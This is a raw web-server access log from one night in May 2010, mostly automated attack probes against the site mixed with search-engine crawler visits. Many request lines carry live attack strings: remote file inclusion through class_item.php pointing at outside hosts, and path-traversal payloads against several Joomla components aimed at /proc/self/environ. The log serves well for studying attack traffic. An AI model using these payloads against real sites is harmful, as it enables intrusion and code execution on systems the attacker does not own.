62.43.194.164 - - [30/May/2010:00:05:19 -0500] "GET /logs//includes/class_item.php?fileExtension=http://alaindaloz.fr//baner.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
62.43.194.164 - - [30/May/2010:00:05:20 -0500] "GET /logs/access_log.1271376000//includes/class_item.php?fileExtension=http://alaindaloz.fr//baner.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
62.43.194.164 - - [30/May/2010:00:05:22 -0500] "GET /logs/access_log.1262563200//includes/class_item.php?fileExtension=http://alaindaloz.fr//baner.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
69.175.84.122 - - [30/May/2010:00:06:03 -0500] "GET /logs/access_log.1273017600//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.831"
69.175.84.122 - - [30/May/2010:00:06:03 -0500] "GET //?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
69.175.84.122 - - [30/May/2010:00:06:03 -0500] "GET /logs//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7548 "-""libwww-perl/5.831"
69.175.84.122 - - [30/May/2010:00:06:21 -0500] "GET /logs/access_log.1273017600//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.831"
69.175.84.122 - - [30/May/2010:00:06:21 -0500] "GET //?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
69.175.84.122 - - [30/May/2010:00:06:22 -0500] "GET /logs//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7548 "-""libwww-perl/5.831"
67.195.112.180 - - [30/May/2010:00:06:54 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.0" 200 3254 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
38.101.148.126 - - [30/May/2010:00:07:07 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [30/May/2010:00:07:12 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
69.64.47.65 - - [30/May/2010:00:10:46 -0500] "GET /logs/access_log.1274227200//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.810"
69.64.47.65 - - [30/May/2010:00:10:46 -0500] "GET //?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
69.64.47.65 - - [30/May/2010:00:10:46 -0500] "GET /logs//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7548 "-""libwww-perl/5.810"
91.121.122.40 - - [30/May/2010:00:10:49 -0500] "GET /logs//includes/class_item.php?fileExtension=http://web.dyjh.tyc.edu.tw//uploads/yes.txt???? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
91.121.122.40 - - [30/May/2010:00:10:49 -0500] "GET //includes/class_item.php?fileExtension=http://web.dyjh.tyc.edu.tw//uploads/yes.txt???? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
69.64.47.65 - - [30/May/2010:00:10:50 -0500] "GET /logs/access_log.1274227200//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.810"
69.64.47.65 - - [30/May/2010:00:10:50 -0500] "GET //?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
69.64.47.65 - - [30/May/2010:00:10:50 -0500] "GET /logs//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7548 "-""libwww-perl/5.810"
69.64.47.65 - - [30/May/2010:00:11:17 -0500] "GET /logs/access_log.1273363200//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.810"
69.64.47.65 - - [30/May/2010:00:11:17 -0500] "GET /logs/access_log.1273363200//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.810"
69.175.84.122 - - [30/May/2010:00:11:51 -0500] "GET /logs/access_log.1273363200//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.831"
69.64.47.65 - - [30/May/2010:00:11:55 -0500] "GET //?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
69.64.47.65 - - [30/May/2010:00:11:55 -0500] "GET //?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
69.64.47.65 - - [30/May/2010:00:11:55 -0500] "GET //?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
69.64.47.65 - - [30/May/2010:00:11:56 -0500] "GET //?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
69.175.84.122 - - [30/May/2010:00:12:00 -0500] "GET //?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
69.175.84.122 - - [30/May/2010:00:12:00 -0500] "GET //?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
69.175.84.122 - - [30/May/2010:00:12:00 -0500] "GET //?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
69.175.84.122 - - [30/May/2010:00:12:00 -0500] "GET //?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
69.175.84.122 - - [30/May/2010:00:12:07 -0500] "GET /logs/access_log.1273363200//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.831"
69.175.84.122 - - [30/May/2010:00:13:01 -0500] "GET /logs/access_log.1274227200//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.831"
69.175.84.122 - - [30/May/2010:00:13:01 -0500] "GET //?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
69.175.84.122 - - [30/May/2010:00:13:01 -0500] "GET /logs//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7548 "-""libwww-perl/5.831"
69.64.47.65 - - [30/May/2010:00:13:20 -0500] "GET /logs/access_log.1273622400//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.810"
69.64.47.65 - - [30/May/2010:00:13:20 -0500] "GET /logs/access_log.1273622400//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.810"
69.175.84.122 - - [30/May/2010:00:13:48 -0500] "GET /logs/access_log.1274227200//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.831"
69.175.84.122 - - [30/May/2010:00:13:48 -0500] "GET //?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
69.175.84.122 - - [30/May/2010:00:13:48 -0500] "GET /logs//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7548 "-""libwww-perl/5.831"
207.46.199.44 - - [30/May/2010:00:14:27 -0500] "GET /logs/access_log.1215820800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
81.202.105.82 - - [30/May/2010:00:15:02 -0500] "GET / HTTP/1.1" 200 1003 "-""Java/1.6.0_17"
69.175.84.122 - - [30/May/2010:00:15:17 -0500] "GET /logs/access_log.1273622400//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.831"
69.175.84.122 - - [30/May/2010:00:16:03 -0500] "GET /logs/access_log.1273622400//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.831"
207.46.199.184 - - [30/May/2010:00:18:47 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
69.175.84.122 - - [30/May/2010:00:19:58 -0500] "GET /logs/access_log.1273363200//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.831"
69.175.84.122 - - [30/May/2010:00:19:58 -0500] "GET //?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
69.175.84.122 - - [30/May/2010:00:19:58 -0500] "GET /logs//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7548 "-""libwww-perl/5.831"
69.64.47.65 - - [30/May/2010:00:20:04 -0500] "GET /logs/access_log.1273363200//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.810"
69.64.47.65 - - [30/May/2010:00:20:04 -0500] "GET //?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
69.64.47.65 - - [30/May/2010:00:20:04 -0500] "GET /logs//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7548 "-""libwww-perl/5.810"
69.64.47.65 - - [30/May/2010:00:20:30 -0500] "GET /logs/access_log.1273363200//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.810"
69.64.47.65 - - [30/May/2010:00:20:30 -0500] "GET //?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
69.64.47.65 - - [30/May/2010:00:20:30 -0500] "GET /logs//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7548 "-""libwww-perl/5.810"
69.175.84.122 - - [30/May/2010:00:21:10 -0500] "GET /logs/access_log.1273363200//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.831"
69.175.84.122 - - [30/May/2010:00:21:10 -0500] "GET //?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
69.175.84.122 - - [30/May/2010:00:21:11 -0500] "GET /logs//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7548 "-""libwww-perl/5.831"
193.47.80.46 - - [30/May/2010:00:21:25 -0500] "GET / HTTP/1.1" 200 1003 "-""Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"
38.101.148.126 - - [30/May/2010:00:21:36 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
69.175.84.122 - - [30/May/2010:00:21:36 -0500] "GET /logs/access_log.1273017600//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.831"
69.64.47.65 - - [30/May/2010:00:21:36 -0500] "GET /logs/access_log.1273017600//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.810"
38.101.148.126 - - [30/May/2010:00:21:42 -0500] "GET /logs/access_log.1213401600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
69.64.47.65 - - [30/May/2010:00:21:45 -0500] "GET /logs/access_log.1273017600//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.810"
38.101.148.126 - - [30/May/2010:00:21:51 -0500] "GET /logs/access_log.1213747200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
69.175.84.122 - - [30/May/2010:00:22:31 -0500] "GET /logs/access_log.1273017600//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.831"
67.195.112.180 - - [30/May/2010:00:24:31 -0500] "GET /logs/access_log.1184457600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
69.175.84.122 - - [30/May/2010:00:25:35 -0500] "GET /logs/access_log.1273622400//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.831"
69.175.84.122 - - [30/May/2010:00:25:35 -0500] "GET //?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
69.175.84.122 - - [30/May/2010:00:25:35 -0500] "GET /logs//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7548 "-""libwww-perl/5.831"
69.64.47.65 - - [30/May/2010:00:25:42 -0500] "GET /logs/access_log.1273622400//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.810"
69.64.47.65 - - [30/May/2010:00:25:42 -0500] "GET //?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
69.64.47.65 - - [30/May/2010:00:25:42 -0500] "GET /logs//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7548 "-""libwww-perl/5.810"
69.64.47.65 - - [30/May/2010:00:25:45 -0500] "GET /logs/access_log.1273622400//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.810"
69.64.47.65 - - [30/May/2010:00:25:45 -0500] "GET //?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
69.64.47.65 - - [30/May/2010:00:25:45 -0500] "GET /logs//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7548 "-""libwww-perl/5.810"
69.175.84.122 - - [30/May/2010:00:25:56 -0500] "GET /logs/access_log.1274313600//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.831"
69.64.47.65 - - [30/May/2010:00:26:03 -0500] "GET /logs/access_log.1274313600//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.810"
69.64.47.65 - - [30/May/2010:00:26:03 -0500] "GET /logs/access_log.1274313600//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.810"
209.126.254.3 - - [30/May/2010:00:26:31 -0500] "GET /logs/index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.76"
209.126.254.3 - - [30/May/2010:00:26:31 -0500] "GET /index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.76"
69.64.47.65 - - [30/May/2010:00:26:32 -0500] "GET /logs/access_log.1273363200//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.810"
69.64.47.65 - - [30/May/2010:00:26:32 -0500] "GET //?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
69.64.47.65 - - [30/May/2010:00:26:32 -0500] "GET /logs//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7548 "-""libwww-perl/5.810"
69.175.84.122 - - [30/May/2010:00:26:38 -0500] "GET /logs/access_log.1273363200//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.831"
69.175.84.122 - - [30/May/2010:00:26:38 -0500] "GET //?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
69.175.84.122 - - [30/May/2010:00:26:38 -0500] "GET /logs//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7548 "-""libwww-perl/5.831"
69.175.84.122 - - [30/May/2010:00:26:39 -0500] "GET /logs/access_log.1273363200//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.831"
69.175.84.122 - - [30/May/2010:00:26:39 -0500] "GET //?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
69.175.84.122 - - [30/May/2010:00:26:39 -0500] "GET /logs//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7548 "-""libwww-perl/5.831"
69.64.47.65 - - [30/May/2010:00:26:44 -0500] "GET /logs/access_log.1273622400//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.810"
74.14.231.236 - - [30/May/2010:00:26:44 -0500] "GET /logs/index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 286 "-""libwww-perl/5.805"
69.64.47.65 - - [30/May/2010:00:26:44 -0500] "GET //?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
69.64.47.65 - - [30/May/2010:00:26:44 -0500] "GET /logs//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7548 "-""libwww-perl/5.810"
74.14.231.236 - - [30/May/2010:00:26:44 -0500] "GET /index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 281 "-""libwww-perl/5.805"
69.64.47.65 - - [30/May/2010:00:26:45 -0500] "GET /logs/access_log.1273363200//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.810"
69.64.47.65 - - [30/May/2010:00:26:45 -0500] "GET //?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
69.64.47.65 - - [30/May/2010:00:26:45 -0500] "GET /logs//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7548 "-""libwww-perl/5.810"
69.64.47.65 - - [30/May/2010:00:27:07 -0500] "GET /logs/access_log.1274313600//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.810"
69.175.84.122 - - [30/May/2010:00:27:22 -0500] "GET /logs/access_log.1273622400//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.831"
69.175.84.122 - - [30/May/2010:00:27:22 -0500] "GET //?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
69.175.84.122 - - [30/May/2010:00:27:22 -0500] "GET /logs//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7548 "-""libwww-perl/5.831"
69.64.47.65 - - [30/May/2010:00:27:24 -0500] "GET /logs/access_log.1273622400//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.810"
69.64.47.65 - - [30/May/2010:00:27:24 -0500] "GET //?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
69.64.47.65 - - [30/May/2010:00:27:24 -0500] "GET /logs//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7548 "-""libwww-perl/5.810"
69.175.84.122 - - [30/May/2010:00:27:42 -0500] "GET /logs/access_log.1274313600//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.831"
69.64.47.65 - - [30/May/2010:00:27:44 -0500] "GET /logs/access_log.1274313600//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.810"
69.175.84.122 - - [30/May/2010:00:27:59 -0500] "GET /logs/access_log.1273622400//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.831"
69.175.84.122 - - [30/May/2010:00:27:59 -0500] "GET //?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
69.175.84.122 - - [30/May/2010:00:27:59 -0500] "GET /logs//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7548 "-""libwww-perl/5.831"
69.175.84.122 - - [30/May/2010:00:28:19 -0500] "GET /logs/access_log.1274313600//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.831"
69.175.84.122 - - [30/May/2010:00:28:21 -0500] "GET /logs/access_log.1273622400//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.831"
69.175.84.122 - - [30/May/2010:00:28:21 -0500] "GET //?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
69.175.84.122 - - [30/May/2010:00:28:21 -0500] "GET /logs//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7548 "-""libwww-perl/5.831"
69.175.84.122 - - [30/May/2010:00:28:47 -0500] "GET /logs/access_log.1274313600//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.831"
209.126.254.141 - - [30/May/2010:00:31:37 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 294 "-""Mozilla/5.0"
209.126.254.141 - - [30/May/2010:00:31:37 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 299 "-""Mozilla/5.0"
209.126.254.141 - - [30/May/2010:00:31:37 -0500] "GET /logs/access_log.1271635200//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 321 "-""Mozilla/5.0"
209.126.254.141 - - [30/May/2010:00:31:37 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 294 "-""libwww-perl/5.76"
209.126.254.141 - - [30/May/2010:00:31:38 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 299 "-""libwww-perl/5.76"
209.126.254.141 - - [30/May/2010:00:31:38 -0500] "GET /logs/access_log.1271635200//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 321 "-""libwww-perl/5.76"
209.126.254.141 - - [30/May/2010:00:31:38 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 294 "-"""
209.126.254.141 - - [30/May/2010:00:31:38 -0500] "GET /logs/access_log.1270598400//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 321 "-""Mozilla/5.0"
209.126.254.141 - - [30/May/2010:00:31:38 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 299 "-"""
209.126.254.141 - - [30/May/2010:00:31:38 -0500] "GET /logs/access_log.1271635200//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 321 "-"""
209.126.254.141 - - [30/May/2010:00:31:38 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-"""
209.126.254.141 - - [30/May/2010:00:31:38 -0500] "GET /logs/access_log.1271635200//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-"""
209.126.254.141 - - [30/May/2010:00:31:38 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-"""
209.126.254.141 - - [30/May/2010:00:31:38 -0500] "GET /logs/access_log.1270598400//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 321 "-""libwww-perl/5.76"
209.126.254.141 - - [30/May/2010:00:31:38 -0500] "GET /logs/access_log.1270598400//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 321 "-"""
209.126.254.141 - - [30/May/2010:00:31:38 -0500] "GET /logs/access_log.1270598400//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-"""
87.250.255.243 - - [30/May/2010:00:32:38 -0500] "GET /logs/access_log.1273190400 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
209.126.254.3 - - [30/May/2010:00:33:30 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.76"
209.126.254.3 - - [30/May/2010:00:33:30 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.76"
74.14.231.236 - - [30/May/2010:00:33:38 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 286 "-""libwww-perl/5.805"
74.14.231.236 - - [30/May/2010:00:33:38 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 281 "-""libwww-perl/5.805"
67.195.112.180 - - [30/May/2010:00:35:10 -0500] "GET /logs/access_log.1240531200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
38.101.148.126 - - [30/May/2010:00:35:35 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [30/May/2010:00:35:40 -0500] "GET /logs/access_log.1214438400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
